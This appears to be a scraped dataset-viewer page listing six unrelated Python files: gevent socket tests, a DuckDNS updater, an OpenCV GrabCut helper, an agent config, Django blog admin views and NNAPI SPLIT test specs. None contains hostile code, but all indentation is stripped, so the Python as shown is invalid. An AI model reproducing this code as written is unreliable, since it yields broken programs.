print('******************************************************')
print('******************************************************')
|
StarcoderdataPython
|
8122293
|
<filename>greentest-py3/test__socket.py
import os
import sys
import array
import gevent
from gevent import socket
import greentest
import time
class TestTCP(greentest.TestCase):
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
def setUp(self):
greentest.TestCase.setUp(self)
self.listener = greentest.tcp_listener(('127.0.0.1', 0))
def tearDown(self):
del self.listener
greentest.TestCase.tearDown(self)
def create_connection(self):
return socket.create_connection(('127.0.0.1', self.listener.getsockname()[1]))
def sendall(self, data):
def accept_and_read():
conn, addr = self.listener.accept()
fd = conn.makefile()
conn.close()
read = fd.read()
fd.close()
return read
server = gevent.spawn(accept_and_read)
try:
client = self.create_connection()
client.sendall(data)
client.close()
read = server.get()
assert read == self.long_data
finally:
server.kill()
def test_sendall_str(self):
self.sendall(self.long_data)
def test_sendall_unicode(self):
self.sendall(str(self.long_data))
def test_sendall_array(self):
data = array.array("u", self.long_data)
self.sendall(data)
def test_fullduplex(self):
def server():
(client, addr) = self.listener.accept()
# start reading, then, while reading, start writing. the reader should not hang forever
N = 100000 # must be a big enough number so that sendall calls trampoline
sender = gevent.spawn(client.sendall, 't' * N)
result = client.recv(1000)
assert result == 'hello world', result
sender.join(timeout=0.2)
sender.kill()
sender.get()
#print '%s: client' % getcurrent()
server_proc = gevent.spawn(server)
client = self.create_connection()
client_reader = gevent.spawn(client.makefile().read)
gevent.sleep(0.001)
client.send('hello world')
# close() used to hang
client.close()
# this tests "full duplex" bug;
server_proc.get()
client_reader.get()
def test_recv_timeout(self):
acceptor = gevent.spawn(self.listener.accept)
try:
client = self.create_connection()
client.settimeout(0.1)
start = time.time()
try:
data = client.recv(1024)
except self.TIMEOUT_ERROR:
assert 0.1 - 0.01 <= time.time() - start <= 0.1 + 0.1, (time.time() - start)
else:
raise AssertionError('%s should have been raised, instead recv returned %r' % (self.TIMEOUT_ERROR, data, ))
finally:
acceptor.get()
def test_sendall_timeout(self):
acceptor = gevent.spawn(self.listener.accept)
try:
client = self.create_connection()
client.settimeout(0.1)
start = time.time()
send_succeed = False
data_sent = 'h' * 100000
try:
client.sendall(data_sent)
except self.TIMEOUT_ERROR:
assert 0.1 - 0.01 <= time.time() - start <= 0.1 + 0.1, (time.time() - start)
else:
assert time.time() - start <= 0.1 + 0.01, (time.time() - start)
send_succeed = True
finally:
conn, addr = acceptor.get()
if send_succeed:
client.close()
data_read = conn.makefile().read()
self.assertEqual(len(data_sent), len(data_read))
self.assertEqual(data_sent, data_read)
print('%s: WARNING: read the data instead of failing with timeout' % self.__class__.__name__)
def test_makefile(self):
def accept_once():
conn, addr = self.listener.accept()
fd = conn.makefile()
conn.close()
fd.write('hello\n')
fd.close()
acceptor = gevent.spawn(accept_once)
try:
client = self.create_connection()
fd = client.makefile()
client.close()
assert fd.readline() == 'hello\n'
assert fd.read() == ''
fd.close()
finally:
acceptor.get()
if hasattr(socket, 'ssl'):
class TestSSL(TestTCP):
certfile = os.path.join(os.path.dirname(__file__), 'test_server.crt')
privfile = os.path.join(os.path.dirname(__file__), 'test_server.key')
TIMEOUT_ERROR = socket.sslerror
def setUp(self):
TestTCP.setUp(self)
self.listener = ssl_listener(('127.0.0.1', 0), self.privfile, self.certfile)
def create_connection(self):
return socket.ssl(socket.create_connection(('127.0.0.1', self.listener.getsockname()[1])))
def ssl_listener(address, private_key, certificate):
import _socket
r = _socket.socket()
sock = socket.ssl(r, private_key, certificate)
greentest.bind_and_listen(sock, address)
return sock
def get_port():
tempsock = socket.socket()
tempsock.bind(('', 0))
port = tempsock.getsockname()[1]
tempsock.close()
return port
class TestCreateConnection(greentest.TestCase):
__timeout__ = 5
def test(self):
try:
socket.create_connection(('localhost', get_port()), timeout=30, source_address=('', get_port()))
except socket.error:
ex = sys.exc_info()[1]
if 'refused' not in str(ex).lower():
raise
else:
raise AssertionError('create_connection did not raise socket.error as expected')
class TestClosedSocket(greentest.TestCase):
switch_expected = False
def test(self):
sock = socket.socket()
sock.close()
try:
sock.send('a', timeout=1)
except socket.error as ex:
if ex.args[0] != 9:
raise
if __name__ == '__main__':
greentest.main()
|
StarcoderdataPython
|
1830800
|
<reponame>Shanduur/monorepo<gh_stars>0
import requests
import os
import time
import re
import logging
import ipaddress
from pythonjsonlogger import jsonlogger
log = logging.getLogger()
__log_handler = logging.StreamHandler()
__formatter = jsonlogger.JsonFormatter('%(asctime)s %(levelname)s %(message)s')
__log_handler.setFormatter(__formatter)
log.addHandler(__log_handler)
log.setLevel(logging.WARN)
def parse_timeout(timeout: str) -> float:
regexp = r'(\d+[H|h])|(\d+[M|m])|(\d+[S|s])'
t = 1.0
if not timeout:
raise ValueError('Timeout was not provided')
m = re.match(regexp, timeout)
if not m:
raise ValueError('Timeout has wrong format')
if 'H' in timeout or 'h' in timeout:
t = t * 60*60
elif 'M' in timeout or 'm' in timeout:
t = t * 60
elif 'S' in timeout or 's' in timeout:
pass
return t * float(timeout[:-1])
class Updater():
def __init__(self):
self.config = dict()
self.config['token'] = os.getenv('DUCKDNS_TOKEN')
self.config['domains'] = os.getenv('DOMAINS')
lvl = os.getenv('LOG_LEVEL')
if lvl:
log.setLevel(lvl)
try:
self.timeout = parse_timeout(os.getenv('TIMEOUT'))
except ValueError as e:
log.warning(f'{e}: using default (6H)')
self.timeout = parse_timeout('6H')
self.ip_api_uri = r'https://api64.ipify.org'
def __get_ip(self):
resp = requests.get(self.ip_api_uri)
if resp.status_code == 200:
self.config['ip'] = resp.text
else:
log.error(f'unable to get ipv4: {resp.reason}')
def __parse_update_uri(self) -> str:
self.__get_ip()
root = 'https://www.duckdns.org/update?'
params = list()
params.append(f"domains={self.config['domains']}")
params.append(f"token={self.config['token']}")
try:
ip = ipaddress.ip_address(self.config['ip'])
if type(ip) == ipaddress.IPv4Address:
params.append(f"ipv4={self.config['ip']}")
elif type(ip) == ipaddress.IPv6Address:
params.append(f"ipv6={self.config['ip']}")
except ValueError or TypeError:
raise ValueError('wrong IP provided')
uri = root + "&".join(params)
log.debug(uri)
return uri
def __update(self):
while True:
resp = requests.get(self.__parse_update_uri())
if resp.text == 'KO':
log.error(f'unable to update ip')
log.debug(self.config)
log.info('sleeping...')
time.sleep(self.timeout)
def run(self) -> None:
self.__get_ip()
self.__update()
def main() -> None:
try:
upd = Updater()
upd.run()
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
9679102
|
import numpy as np
import cv2
class Grab_cut(object):
suffix = '.jpg'
def __init__(self, filename=None):
self.filename = filename
self.height = None
self.width = None
def image_matting(self, image_file, shape, iteration=10):
points = shape['points']
xmin, ymin, xmax, ymax = Grab_cut.convertPoints2BndBox(points)
self.width = xmax - xmin
self.height = ymax - ymin
src_img = cv2.imread(image_file)
mask = np.zeros(src_img.shape[:2], np.uint8)
bgdModel = np.zeros((1, 65), np.float64)
fgdModel = np.zeros((1, 65), np.float64)
rect = (xmin, ymin, self.width, self.height)
# Grabcut
cv2.grabCut(src_img, mask, rect, bgdModel, fgdModel,
iteration, cv2.GC_INIT_WITH_RECT)
r_channel, g_channel, b_channel = cv2.split(src_img)
a_channel = np.where((mask == 2) | (mask == 0), 0, 255).astype('uint8')
# crop image space
for row in range(ymin, ymax):
if sum(r_channel[row, xmin:xmax + 1]) > 0:
out_ymin = row
break
for row in range(ymin, ymax)[::-1]:
if sum(r_channel[row, xmin:xmax + 1]) > 0:
out_ymax = row + 1
break
for col in range(xmin, xmax):
if sum(a_channel[ymin:ymax + 1, col]) > 0:
out_xmin = col
break
for col in range(xmin, xmax)[::-1]:
if sum(a_channel[ymin:ymax + 1, col]) > 0:
out_xmax = col + 1
break
# output image
img_RGBA = cv2.merge((r_channel[out_ymin:out_ymax, out_xmin:out_xmax],
g_channel[out_ymin:out_ymax, out_xmin:out_xmax],
b_channel[out_ymin:out_ymax, out_xmin:out_xmax],
a_channel[out_ymin:out_ymax, out_xmin:out_xmax]))
return img_RGBA
@staticmethod
def convertPoints2BndBox(points):
xmin = float('inf')
ymin = float('inf')
xmax = float('-inf')
ymax = float('-inf')
for p in points:
x = p[0]
y = p[1]
xmin = min(x, xmin)
ymin = min(y, ymin)
xmax = max(x, xmax)
ymax = max(y, ymax)
# <NAME>, 2015/11/12
# 0-valued coordinates of BB caused an error while
# training faster-rcnn object detector.
if xmin < 1:
xmin = 1
if ymin < 1:
ymin = 1
return (int(xmin), int(ymin), int(xmax), int(ymax))
@staticmethod
def resultSave(save_path, image_np):
cv2.imwrite(save_path, image_np)
|
StarcoderdataPython
|
5032405
|
'''The default configuration for pythonagent'''
DEFAULT_AGENT_CONFIG = {
'_use_console_span_exporter': False,
'enabled': True,
'propagation_formats': ['TRACECONTEXT'],
'service_name': 'pythonagent',
'reporting': {
'endpoint': 'http://localhost:4317',
'secure': False,
'trace_reporter_type': 'OTLP',
'token': '',
'opa': {
'endpoint': 'http://opa.traceableai:8181/',
'poll_period_seconds': 60,
'enabled': False,
}
},
'data_capture': {
'http_headers': {
'request': True,
'response': True,
},
'http_body': {
'request': True,
'response': True,
},
'rpc_metadata': {
'request': True,
'response': True,
},
'rpc_body': {
'request': True,
'response': True,
},
'body_max_size_bytes': 131072
},
'resource_attributes': {}
}
|
StarcoderdataPython
|
5020475
|
# -*- coding: utf-8 -*-
from Instanssi.common.http import Http403
from Instanssi.common.auth import staff_access_required
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from Instanssi.ext_blog.models import BlogEntry
from Instanssi.admin_blog.forms import BlogEntryForm, BlogEntryEditForm
from Instanssi.admin_base.misc.custom_render import admin_render
# Logging related
import logging
logger = logging.getLogger(__name__)
@staff_access_required
def index(request, sel_event_id):
# Post
if request.method == 'POST':
# Check for permissions
if not request.user.has_perm('ext_blog.add_blogentry'):
raise Http403
# Handle form
form = BlogEntryForm(request.POST)
if form.is_valid():
entry = form.save(commit=False)
entry.event_id = int(sel_event_id)
entry.date = timezone.now()
entry.user = request.user
entry.save()
logger.info('Blog entry "'+entry.title+'" added.', extra={'user': request.user, 'event_id': sel_event_id})
return HttpResponseRedirect(reverse('manage-blog:index', args=(sel_event_id,)))
else:
form = BlogEntryForm()
# Get events
entries = BlogEntry.objects.filter(event_id = sel_event_id)
# Render response
return admin_render(request, "admin_blog/index.html", {
'entries': entries,
'selected_event_id': int(sel_event_id),
'addform': form,
})
@staff_access_required
def edit(request, sel_event_id, entry_id):
# Check for permissions
if not request.user.has_perm('ext_blog.change_blogentry'):
raise Http403
# Get old entry
entry = get_object_or_404(BlogEntry, pk=entry_id)
# Go ahead and edit
if request.method == 'POST':
form = BlogEntryEditForm(request.POST, instance=entry)
if form.is_valid():
entry = form.save()
logger.info('Blog entry "'+entry.title+'" edited.', extra={'user': request.user, 'event_id': sel_event_id})
return HttpResponseRedirect(reverse('manage-blog:index', args=(sel_event_id,)))
else:
form = BlogEntryEditForm(instance=entry)
# Render response
return admin_render(request, "admin_blog/edit.html", {
'editform': form,
'selected_event_id': int(sel_event_id),
})
@staff_access_required
def delete(request, sel_event_id, entry_id):
# Check for permissions
if not request.user.has_perm('ext_blog.delete_blogentry'):
raise Http403
# Delete entry
try:
entry = BlogEntry.objects.get(id=entry_id)
entry.delete()
logger.info('Blog entry "'+entry.title+'" deleted.', extra={'user': request.user, 'event_id': sel_event_id})
except BlogEntry.DoesNotExist:
pass
return HttpResponseRedirect(reverse('manage-blog:index', args=(sel_event_id,)))
|
StarcoderdataPython
|
4826324
|
<reponame>aosp-goes-brrbrr/packages_modules_NeuralNetworks
#
# Copyright (C) 2019 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{6}, 1.0, -128")
axis = Int32Scalar("axis", 0)
num_splits = Int32Scalar("num_splits", 3)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2}, 1.0, -128")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED", "{2}, 1.0, -128")
output2 = Output("output2", "TENSOR_QUANT8_ASYMM_SIGNED", "{2}, 1.0, -128")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1, output2))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122]}
output_dict = {
output0: [-127, -126],
output1: [-125, -124],
output2: [-123, -122],
}
# Instantiate an example
Example((input_dict, output_dict)).AddRelaxed()
#######################################################
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 3}, 2.0, -125")
axis = Int32Scalar("axis", 0)
num_splits = Int32Scalar("num_splits", 2)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED", "{1, 3}, 2.0, -125")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED", "{1, 3}, 2.0, -125")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122]}
output_dict = {
output0: [-127, -126, -125],
output1: [-124, -123, -122],
}
# Instantiate an example
Example((input_dict, output_dict)).AddRelaxed()
#######################################################
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 3}, 2.0, -125")
axis = Int32Scalar("axis", 1)
num_splits = Int32Scalar("num_splits", 3)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 1}, 2.0, -125")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 1}, 2.0, -125")
output2 = Output("output2", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 1}, 2.0, -125")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1, output2))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122]}
output_dict = {
output0: [-127, -124],
output1: [-126, -123],
output2: [-125, -122],
}
# Instantiate an example
Example((input_dict, output_dict))
#######################################################
input0 = Input("input0", "TENSOR_QUANT8_ASYMM_SIGNED", "{2, 2, 2}, 1.0, -128")
axis = Int32Scalar("axis", 1)
num_splits = Int32Scalar("num_splits", 2)
output0 = Output("output0", "TENSOR_QUANT8_ASYMM_SIGNED",
"{2, 1, 2}, 1.0, -128")
output1 = Output("output1", "TENSOR_QUANT8_ASYMM_SIGNED",
"{2, 1, 2}, 1.0, -128")
model = Model().Operation("SPLIT", input0, axis, num_splits).To(
(output0, output1))
# Example 1.
input_dict = {input0: [-127, -126, -125, -124, -123, -122, -121, -120]}
output_dict = {
output0: [-127, -126, -123, -122],
output1: [-125, -124, -121, -120],
}
# Instantiate an example
Example((input_dict, output_dict))
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.